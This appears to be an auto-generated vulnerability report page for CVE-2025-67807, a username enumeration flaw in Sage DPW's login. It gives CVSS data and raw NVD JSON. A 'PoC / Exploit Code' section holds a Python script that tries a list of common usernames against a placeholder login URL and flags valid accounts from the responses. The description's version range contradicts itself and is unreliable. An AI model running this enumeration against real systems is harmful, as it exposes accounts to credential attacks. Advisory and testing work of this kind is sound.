Security Vulnerability Report
中文
CVE-2025-67807 CVSS 4.7 MEDIUM

CVE-2025-67807

Published: 2026-04-01 16:23:48
Last Modified: 2026-04-07 19:22:35

Description

The login mechanism of Sage DPW 2025_06_004 displays distinct responses for valid and invalid usernames, allowing enumeration of existing accounts in versions before 2021_06_000. On-premise administrators can toggle this behaviour in newer versions.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:sagedpw:sage_dpw:2025_06_004:*:*:*:*:*:*:* - VULNERABLE
Sage DPW < 2021_06_000

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL configuration target_url = "https://target-sage-dpw-instance.com/login" # List of potential usernames to enumerate user_list = ["admin", "administrator", "test", "guest", "user"] def check_username(url, username): """Check if the username exists based on response differences.""" # Simulate login attempt with a fixed incorrect password payload = { "username": username, "password": "InvalidPassword123!" } try: response = requests.post(url, data=payload, timeout=5) # Logic based on the vulnerability description: # Distinct responses for valid vs invalid usernames. # Example: checking for specific error messages or status codes. if "Invalid username" in response.text or response.status_code == 404: return False # User does not exist elif "Invalid password" in response.text or response.status_code == 401: return True # User exists (password check reached) else: # Fallback: analyze response content or length return "Unknown" except requests.RequestException as e: print(f"[Error] Connection failed: {e}") return None if __name__ == "__main__": print(f"[*] Starting username enumeration against {target_url}") for user in user_list: result = check_username(target_url, user) if result is True: print(f"[+] Found valid user: {user}") elif result is False: print(f"[-] User not found: {user}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67807", "sourceIdentifier": "[email protected]", "published": "2026-04-01T16:23:48.470", "lastModified": "2026-04-07T19:22:34.767", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The login mechanism of Sage DPW 2025_06_004 displays distinct responses for valid and invalid usernames, allowing enumeration of existing accounts in versions before 2021_06_000. On-premise administrators can toggle this behaviour in newer versions."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-204"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sagedpw:sage_dpw:2025_06_004:*:*:*:*:*:*:*", "matchCriteriaId": "633B447B-E044-4548-9D21-E82129683125"}]}]}], "references": [{"url": "https://pastebin.com/Tk4LgMG2", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.sagedpw.at/", "source": "[email protected]", "tags": ["Product"]}]}}